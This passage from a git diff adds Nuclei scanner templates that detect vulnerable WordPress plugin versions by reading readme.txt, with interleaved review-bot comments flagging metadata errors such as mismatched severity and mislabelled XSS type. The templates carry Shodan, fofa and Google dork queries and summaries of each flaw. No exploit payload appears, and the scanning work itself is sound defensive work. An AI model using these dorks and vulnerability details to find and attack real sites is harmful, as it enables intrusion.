+ google-query: inurl:"/wp-content/plugins/ider-login/"
+ shodan-query: 'vuln:CVE-2024-11888'
+ tags: cve,wordpress,wp-plugin,ider-login,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ider-login/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ider-login"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml b/poc/cve/CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml
new file mode 100644
index 0000000000..b8ee751488
--- /dev/null
+++ b/poc/cve/CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3
+
+info:
+ name: >
+ My IDX Home Search <= 2.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-search' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/172b6b54-d1de-48f9-ad2f-00d62d7e91fd?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11889
+ metadata:
+ fofa-query: "wp-content/plugins/my-idx-home-search/"
+ google-query: inurl:"/wp-content/plugins/my-idx-home-search/"
+ shodan-query: 'vuln:CVE-2024-11889'
+ tags: cve,wordpress,wp-plugin,my-idx-home-search,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/my-idx-home-search/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "my-idx-home-search"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf.yaml b/poc/cve/CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf.yaml
new file mode 100644
index 0000000000..fc002e353a
--- /dev/null
+++ b/poc/cve/CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf
+
+info:
+ name: >
+ The Permalinker <= 1.8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The The Permalinker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'permalink' shortcode in all versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d03dbe48-371f-4fb7-8902-a013338ac7d4?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11894
+ metadata:
+ fofa-query: "wp-content/plugins/the-permalinker/"
+ google-query: inurl:"/wp-content/plugins/the-permalinker/"
+ shodan-query: 'vuln:CVE-2024-11894'
+ tags: cve,wordpress,wp-plugin,the-permalinker,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/the-permalinker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "the-permalinker"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11910.yaml b/poc/cve/CVE-2024-11910.yaml
new file mode 100644
index 0000000000..67278fbcd4
--- /dev/null
+++ b/poc/cve/CVE-2024-11910.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11910-f64cb945375a031c726e01062aefcdec
+
+info:
+ name: >
+ WP Crowdfunding <= 2.1.12 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP Crowdfunding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp-crowdfunding/search block in all versions up to, and including, 2.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1541aaf-9f35-44b5-a985-1b8d33228f0a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11910
+ metadata:
+ fofa-query: "wp-content/plugins/wp-crowdfunding/"
+ google-query: inurl:"/wp-content/plugins/wp-crowdfunding/"
+ shodan-query: 'vuln:CVE-2024-11910'
+ tags: cve,wordpress,wp-plugin,wp-crowdfunding,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-crowdfunding/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-crowdfunding"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.12')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11911.yaml b/poc/cve/CVE-2024-11911.yaml
new file mode 100644
index 0000000000..c4a84da7c0
--- /dev/null
+++ b/poc/cve/CVE-2024-11911.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11911-faf718aed0ef166f0179212ee8a9f3c3
+
+info:
+ name: >
+ WP Crowdfunding <= 2.1.12 - Missing Authorization to Authenticated (Subscriber+) WooCommerce Installation
+ author: topscoder
+ severity: low
+ description: >
+ The WP Crowdfunding plugin for WordPress is vulnerable to unauthorized plugin installation due to a missing capability check on the install_woocommerce_plugin() function action in all versions up to, and including, 2.1.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install WooCommerce. This has a limited impact on most sites because WooCommerce is a requirement.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/972be091-64c4-4cb7-9563-70249c0db157?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-11911
+ metadata:
+ fofa-query: "wp-content/plugins/wp-crowdfunding/"
+ google-query: inurl:"/wp-content/plugins/wp-crowdfunding/"
+ shodan-query: 'vuln:CVE-2024-11911'
+ tags: cve,wordpress,wp-plugin,wp-crowdfunding,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-crowdfunding/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-crowdfunding"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.12')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12015.yaml b/poc/cve/CVE-2024-12015.yaml
new file mode 100644
index 0000000000..608f4ae2c8
--- /dev/null
+++ b/poc/cve/CVE-2024-12015.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-12015-a21eb9ced96f7c622c2eb418f1acf002 + +info: + name: > + WP Project Manager <= 2.6.16 - Authenticated (Project Manager+) SQL Injection + author: topscoder + severity: low + description: > + The WP Project Manager plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in the '/pm/v2/activites' route in all versions due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Project Manager-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c093ed6a-0f3d-4ad9-a57c-cec1c2e7bd8e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-12015 + metadata: + fofa-query: "wp-content/plugins/wedevs-project-manager/" + google-query: inurl:"/wp-content/plugins/wedevs-project-manager/" + shodan-query: 'vuln:CVE-2024-12015' + tags: cve,wordpress,wp-plugin,wedevs-project-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wedevs-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wedevs-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.16') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12042.yaml b/poc/cve/CVE-2024-12042.yaml new file mode 100644 index 0000000000..85abf79aa1 
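Review bot: The `description` says the plugin is vulnerable "in all versions" with no upper bound, while `name` and the `dsl` matcher both limit the finding to `<= 2.6.16`. As written, a reader cannot tell whether later versions are fixed or whether the matcher is under-reporting. If the bound in `name` is the correct one, the description should read "in all versions up to, and including, 2.6.16"; if no fix exists, the `compare_versions(version, '<= 2.6.16')` matcher would miss newer installs and should be revisited.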
--- /dev/null +++ b/poc/cve/CVE-2024-12042.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12042-d175dab1029fa17bfb46ec52ed2225e6 + +info: + name: > + MStore API – Create Native Android & iOS Apps On The Cloud <= 4.16.4 - Authenticated (Subscriber+) HTML File Upload (Stored Cross-Site Scripting) + author: topscoder + severity: low + description: > + The MStore API – Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the profile picture upload functionality in all versions up to, and including, 4.16.4 due to insufficient file type validation. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload HTML files with arbitrary web scripts that will execute whenever a user accesses the file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/af468138-c10a-4f9b-b714-0425d52f0210?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-12042 + metadata: + fofa-query: "wp-content/plugins/mstore-api/" + google-query: inurl:"/wp-content/plugins/mstore-api/" + shodan-query: 'vuln:CVE-2024-12042' + tags: cve,wordpress,wp-plugin,mstore-api,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mstore-api" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.16.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-12300.yaml b/poc/cve/CVE-2024-12300.yaml new file mode 100644 index 0000000000..cfffb727ad --- /dev/null +++ b/poc/cve/CVE-2024-12300.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12300-fbca05b17c67e0a0b0725e51de7d84fc + +info: + name: > + AR for WordPress <= 7.3 - Missing Authorization to Unauthenticated Limited File Upload + author: topscoder + severity: high + description: > + The AR for WordPress plugin for WordPress is vulnerable to unauthorized double extension file upload due to a missing capability check on the set_ar_featured_image() function in all versions up to, and including, 7.3. This makes it possible for unauthenticated attackers to upload php files leveraging a double extension attack. It's important to note the file is deleted immediately and double extension attacks only work on select servers making this unlikely to be successfully exploited. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8b507369-49f7-4a1d-900b-c7bef40aec96?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 3.7 + cve-id: CVE-2024-12300 + metadata: + fofa-query: "wp-content/plugins/ar-for-wordpress/" + google-query: inurl:"/wp-content/plugins/ar-for-wordpress/" + shodan-query: 'vuln:CVE-2024-12300' + tags: cve,wordpress,wp-plugin,ar-for-wordpress,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ar-for-wordpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ar-for-wordpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12309.yaml b/poc/cve/CVE-2024-12309.yaml new file mode 100644 index 0000000000..b7ce81eea1 --- /dev/null 
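Review bot: `severity: high` and the `high` tag overstate this finding relative to the rest of the `info` block, which gives `cvss-score: 3.7` (Low band, vector `AC:H` with only `I:L`) and describes the upload as deleted immediately and "unlikely to be successfully exploited". Since the template only fingerprints the readme.txt version, every install at or below 7.3 would be reported as a high-severity hit and would crowd out genuinely urgent results in triage. I would align the label with the score: `severity: low` and `tags: cve,wordpress,wp-plugin,ar-for-wordpress,low`.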
+++ b/poc/cve/CVE-2024-12309.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12309-a66a88222b4d4522bfdbcfa49436df90 + +info: + name: > + Rate My Post – Star Rating Plugin by FeedbackWP <= 4.2.4 - Unauthenticated Voting On Scheduled Posts + author: topscoder + severity: medium + description: > + The Rate My Post – Star Rating Plugin by FeedbackWP plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.4 via the get_post_status() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to vote on unpublished scheduled posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9aa467f-9ac2-4a84-b0bb-761101733af7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-12309 + metadata: + fofa-query: "wp-content/plugins/rate-my-post/" + google-query: inurl:"/wp-content/plugins/rate-my-post/" + shodan-query: 'vuln:CVE-2024-12309' + tags: cve,wordpress,wp-plugin,rate-my-post,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rate-my-post/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rate-my-post" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12411-f0a38e379813866e02459d465ef6affd.yaml b/poc/cve/CVE-2024-12411-f0a38e379813866e02459d465ef6affd.yaml new file mode 100644 index 0000000000..7bea6af802 --- /dev/null +++ b/poc/cve/CVE-2024-12411-f0a38e379813866e02459d465ef6affd.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12411-f0a38e379813866e02459d465ef6affd + +info: + name: > + WP Ad Guru – Banner ad, Responsive popup, Popup maker, Ad rotator & More <= 2.5.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP Ad Guru – Banner ad, Responsive popup, Popup maker, Ad rotator & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aa9edf84-7ba0-488c-93ca-ed0b2ee435d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12411 + metadata: + fofa-query: "wp-content/plugins/wp-ad-guru/" + google-query: inurl:"/wp-content/plugins/wp-ad-guru/" + shodan-query: 'vuln:CVE-2024-12411' + tags: cve,wordpress,wp-plugin,wp-ad-guru,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-ad-guru/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-ad-guru" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12414.yaml b/poc/cve/CVE-2024-12414.yaml new file mode 100644 index 0000000000..4a6c6d1581 --- /dev/null +++ b/poc/cve/CVE-2024-12414.yaml 
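Review bot: `name` classifies this as "Reflected Cross-Site Scripting" but `description` says the plugin is "vulnerable to Stored Cross-Site Scripting via the 'page' parameter" and talks about scripts that run "whenever a user accesses an injected page". The vector `UI:R` and the unauthenticated `page` parameter are consistent with the reflected reading, so the description appears to be the part that is wrong. The distinction matters for remediation priority and for what evidence a responder looks for (stored content versus crafted links). I would reword the description to say "Reflected Cross-Site Scripting" and to describe execution when a user is tricked into following a crafted link, as the CVE-2024-12422 template in this commit does.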
@@ -0,0 +1,59 @@ +id: CVE-2024-12414-86f1cff4a3be047a175aa262edd3a292 + +info: + name: > + Themify Store Locator <= 1.1.9 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Themify Store Locator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.9. This is due to missing or incorrect nonce validation on the setting_page() function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/287abdef-24de-4e1b-a673-59cd37411bf6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12414 + metadata: + fofa-query: "wp-content/plugins/themify-store-locator/" + google-query: inurl:"/wp-content/plugins/themify-store-locator/" + shodan-query: 'vuln:CVE-2024-12414' + tags: cve,wordpress,wp-plugin,themify-store-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/themify-store-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "themify-store-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12417.yaml b/poc/cve/CVE-2024-12417.yaml new file mode 100644 index 0000000000..c92a97d924 --- /dev/null +++ b/poc/cve/CVE-2024-12417.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12417-4592606a248f09bd9c69bf93e7bb5817 + +info: + name: > + Simple Link Directory <= 8.4.0 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: medium + description: > + The The Simple Link Directory plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 8.4.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b7112840-f190-4867-9408-c96408f28b7a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-12417 + metadata: + fofa-query: "wp-content/plugins/simple-link-directory/" + google-query: inurl:"/wp-content/plugins/simple-link-directory/" + shodan-query: 'vuln:CVE-2024-12417' + tags: cve,wordpress,wp-plugin,simple-link-directory,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-link-directory/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-link-directory" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.4.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12420.yaml b/poc/cve/CVE-2024-12420.yaml new file mode 100644 index 0000000000..13db15bddf --- /dev/null +++ b/poc/cve/CVE-2024-12420.yaml 
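Review bot: The `description` opens with a doubled article, "The The Simple Link Directory plugin", which should be "The Simple Link Directory plugin". The same typo is in the descriptions of the CVE-2024-12420 ("The The WPMobile.App") and CVE-2024-12421 ("The The Coupon Affiliates") templates. These strings are shown verbatim in scan reports, so they are worth fixing at the source of the generated text.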
@@ -0,0 +1,59 @@ +id: CVE-2024-12420-bd0164689b2a5de480b05483a455d4bf + +info: + name: > + WPMobile.App — Android and iOS Mobile Application <= 11.52 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: medium + description: > + The The WPMobile.App — Android and iOS Mobile Application plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 11.52. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3ad03e3f-fb3e-4a80-9eea-d24459ed62b8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-12420 + metadata: + fofa-query: "wp-content/plugins/wpappninja/" + google-query: inurl:"/wp-content/plugins/wpappninja/" + shodan-query: 'vuln:CVE-2024-12420' + tags: cve,wordpress,wp-plugin,wpappninja,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpappninja/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpappninja" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 11.52') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12421.yaml b/poc/cve/CVE-2024-12421.yaml new file mode 100644 index 0000000000..e0cf540f66 --- /dev/null +++ b/poc/cve/CVE-2024-12421.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12421-3364cc8f248f3c81c66642b52b7e4546 + +info: + name: > + Coupon Affiliates – Affiliate Plugin for WooCommerce <= 5.16.7.1 - Unauthenticated Arbitrary Shortcode Execution and Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The The Coupon Affiliates – Affiliate Plugin for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.16.7.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. This functionality is also vulnerable to Reflected Cross-Site Scripting. The Cross-Site Scripting was patched in version 5.16.7.1, while the arbitrary shortcode execution was patched in 5.16.7.2. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/66b669ce-142a-48b8-9adf-620657c2db74?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-12421 + metadata: + fofa-query: "wp-content/plugins/woo-coupon-usage/" + google-query: inurl:"/wp-content/plugins/woo-coupon-usage/" + shodan-query: 'vuln:CVE-2024-12421' + tags: cve,wordpress,wp-plugin,woo-coupon-usage,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-coupon-usage/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-coupon-usage" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.16.7.1') \ No newline 
at end of file diff --git a/poc/cve/CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml b/poc/cve/CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml new file mode 100644 index 0000000000..fdf91bd1c9 --- /dev/null +++ b/poc/cve/CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml 
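Review bot: The `name` of the CVE-2024-12421 template attributes both the shortcode execution and the reflected XSS to `<= 5.16.7.1`, but the description states the XSS was patched in 5.16.7.1 and only the shortcode execution in 5.16.7.2. A match on exactly 5.16.7.1 therefore indicates only the shortcode issue, and the report gives no hint of which version actually resolves the finding. I would add a `remediation: Update to 5.16.7.2 or later.` line to `info`, plus a comment next to the matcher, `# 5.16.7.1 is affected by the shortcode execution only; the XSS is fixed in that release`.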
@@ -0,0 +1,59 @@ +id: CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c + +info: + name: > + Import Eventbrite Events <= 1.7.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Import Eventbrite Events plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f799db97-ca61-439d-94ec-a44270d1cd07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12422 + metadata: + fofa-query: "wp-content/plugins/import-eventbrite-events/" + google-query: inurl:"/wp-content/plugins/import-eventbrite-events/" + shodan-query: 'vuln:CVE-2024-12422' + tags: cve,wordpress,wp-plugin,import-eventbrite-events,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/import-eventbrite-events/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 